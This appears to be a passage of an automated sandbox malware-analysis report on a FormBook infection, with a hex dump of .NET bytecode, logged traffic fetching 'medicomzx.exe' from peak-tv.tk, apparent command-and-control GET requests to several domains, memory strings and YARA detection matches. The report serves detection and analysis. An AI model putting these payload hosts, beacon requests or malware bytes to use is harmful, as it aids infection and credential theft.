00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00
          Source: global trafficHTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Jan 2022 17:18:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 179X-Sorting-Hat-ShopId: 59690647732X-Dc: gcp-europe-west1X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd048db19b64333-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 17:18:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://led24.de/iconset/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://p.yusukekamiyamane.com/
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://splashyfish.com/icons/
          Source: explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431896377.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://www.fatcow.com/free-icons/
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://www.gnome.org/
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp01l
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
          Source: explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: http://www.small-icons.com/packs/16x16-free-application-icons.htm
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: medicomsh78694.exeString found in binary or memory: https://github.com/proviq/lusrmgr
          Source: medicomsh78694.exeString found in binary or memory: https://github.com/proviq/lusrmgr/
          Source: medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpString found in binary or memory: https://visualpharm.com/must_have_icon_set/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: peak-tv.tk
          Source: global trafficHTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: medicomzx[1].exe.2.dr, MainForm.csLong String: Length: 22528
          Source: medicomsh78694.exe.2.dr, MainForm.csLong String: Length: 22528
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.csLong String: Length: 22528
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.csLong String: Length: 22528
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.csLong String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.csLong String: Length: 22528
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
